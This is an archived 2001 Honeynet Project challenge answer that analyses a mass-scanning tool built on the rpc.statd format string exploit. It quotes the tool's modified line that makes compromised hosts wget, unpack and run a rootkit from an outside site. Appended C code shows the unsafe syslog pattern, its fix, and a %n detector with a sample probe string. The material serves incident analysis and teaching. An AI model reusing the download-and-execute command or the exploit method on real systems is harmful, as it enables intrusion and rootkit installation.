From greg@linuxpower.cx Fri Mar 23 10:13:55 2001
Date: Mon, 19 Mar 2001 12:18:41 -0500
From: Gregory Maxwell
To: project@honeynet.org
Subject: March Submission

1. What is the blackhat attempting to do with his command line syntax?

The attacker is attempting to opportunistically obtain unauthorized access to large groups of systems by probing large blocks of IP space for vulnerable Red Hat 6.2 systems running nfs-utils-0.1.6-2. The attacker scanned the following subnets:

    216.210.0.0/16
    200.120.0.0/16
    64.120.0.0/16
    216.200.0.0/16
    200.120.0.0/16
    63.1.0.0/16
    216.10.0.0/16
    210.120.0.0/16
    64.1.0.0/16
    216.1.0.0/16
    194.1.0.0/16
    210.128.0.0/16
    24.1.0.0/16
    12.20.0.0/16

2. What does the tool accomplish?

The tool takes a specification of network space as input and attempts to attack every address contained within. After attacking a vulnerable system the tool causes the system to download a file called http://www.becys.org/xzibit.tar.gz and execute a contained program called 'install'. Presumably this is a shell-kit of some kind; however, the file is no longer available so I cannot determine its exact nature. After it has completed its dirty deed on a vulnerable system it alerts its operator via stdout.

3. How does the tool work?

A wrapper script and wrapper program iteratively execute an exploit program against a large number of hosts. The stupid way the subnet is specified and the idiotic method the wrapper program uses to iterate the target address show that while the author might be a 'mA$+3r h4x0r', he/she isn't worth a damn as a programmer. This attack exploits a format string vulnerability in a call to syslog, a very trendy method of attack today. Although this vulnerability was discovered and patched more than 6 months ago, there are still a great number of vulnerable systems out there. This attack allows the lucky attacker the ability to execute arbitrary commands on the vulnerable target.
The luckstatdx.c program utilizes this security hole to download and execute what appears to be a root-kit (from both its name, lamerk, i.e. lame root-kit, and how it is used).

4. Is this tool a worm, or would you classify it as something else?

This tool is not a worm. It is an automated attack tool which allows any incompetent attacker the ability to opportunistically locate and exploit many systems without missing their Saturday-morning cartoons. Because I cannot obtain the code executed by this attack (http://www.becys.org/xzibit.tar.gz), I cannot determine the exact nature of the attack. It is possible that the downloaded code is not a root-kit but is instead a worm; if that is the case then this utility could be considered a worm-jumpstarter, although it would still just be an automated attack tool.

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

This tool is an effective, but poorly written, set of wrappers around a slightly modified copy of the statdx.c utility (http://marc.theaimsgroup.com/?l=bugtraq&m=96562828810798&w=2). The statdx utility was only modified so that it would install the attacker's choice of software on the attacked system:

    // Becys was modify herre some cmd.
    fmax = max(fileno(stdin), sockd) + 1;
    send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);
    // I think an exit is needed here.

Bonus Question: What information can you obtain about who is using or created the tool?

The tool is obtaining its core exploit code from www.becys.org. It is possible, even likely, that the user of the attack code has a relationship with someone who has sufficient privileges to place files on www.becys.org. The tool itself claims to be authored by 'becys'.
It is also possible that the attacker in this case did not have any association with the crackers at www.becys.org but was instead too ignorant to modify the program to obtain its root-kit from their own haven. (They would want to do this because the root-kit at www.becys.org will have a set backdoor of some kind, and by checking their access logs anyone with administrative powers at that site would have root access to all the systems the attacker here has compromised.)

Gregory Maxwell
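Appended illustration of the defect class named in answer 3 (a syslog() call whose format argument is attacker-controlled data). This is added example code, not part of Gregory Maxwell's submission and not code from statdx.c or nfs-utils; the function names (log_mon_request_safe, format_mon_request, count_directives, has_n_directive) and the sample client strings are my own constructions. The vulnerable call appears only inside a comment so that it is never compiled; the compiled code shows the fixed-format-string repair and a small audit/detection helper that flags printf directives, in particular %n, in data that reaches a log call.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Added illustration (hypothetical names), not code from statdx.c or
 * nfs-utils. A daemon that logs a client-supplied string, such as the
 * host name carried in a status-monitor request, must never pass that
 * string to syslog() as the format argument.
 *
 * Unsafe pattern, kept in a comment only:
 *
 *     syslog(LOG_ERR, mon_name);   // mon_name arrived over the network
 *
 * Any '%' directives inside mon_name are interpreted by the printf
 * engine: %x reads stack words, %s dereferences them, %n writes memory.
 * That is the whole basis of the statd format string attack. */

/* Safe pattern: constant format, untrusted data passed as a %s argument,
 * so its bytes are copied verbatim and never interpreted. */
static void log_mon_request_safe(const char *mon_name)
{
    syslog(LOG_ERR, "status monitor request for %s", mon_name);
}

/* The same repair applied to a buffer-building helper, which is easier to
 * check than syslog(). Returns the length snprintf reports. */
static int format_mon_request(char *out, size_t outlen, const char *mon_name)
{
    return snprintf(out, outlen, "status monitor request for %s", mon_name);
}

/* Audit/detection helper: count printf conversion directives in untrusted
 * input and report whether '%n' (the only directive that writes memory)
 * is present. "%%" is a literal percent sign and is not counted. A %n in a
 * client host name is a strong indicator of a format string probe. */
static int scan_directives(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent, skip both characters */
            p++;
            continue;
        }
        count++;
        p++;                    /* skip flags, width, precision, length */
        while (*p != '\0' && strchr("-+ #0123456789.*hlLqjzt", *p) != NULL)
            p++;
        if (*p == 'n')
            *has_n = 1;
        if (*p == '\0')
            break;              /* string ended inside a directive */
    }
    return count;
}

static int count_directives(const char *s)
{
    int has_n;
    return scan_directives(s, &has_n);
}

static int has_n_directive(const char *s)
{
    int has_n;
    scan_directives(s, &has_n);
    return has_n;
}

int main(void)
{
    /* constructed samples: a benign host name and a format string probe */
    const char *samples[] = { "client.example.net", "%x%x%x%n" };
    char buf[128];

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        format_mon_request(buf, sizeof buf, samples[i]);
        log_mon_request_safe(samples[i]);   /* directives stay inert */
        printf("%-20s directives=%d has_%%n=%d -> \"%s\"\n",
               samples[i], count_directives(samples[i]),
               has_n_directive(samples[i]), buf);
    }
    return 0;
}
```

Run on the two constructed samples, the probe string is reported with four directives and a %n, while the formatted log line still contains the probe bytes literally rather than anything the directives would have produced.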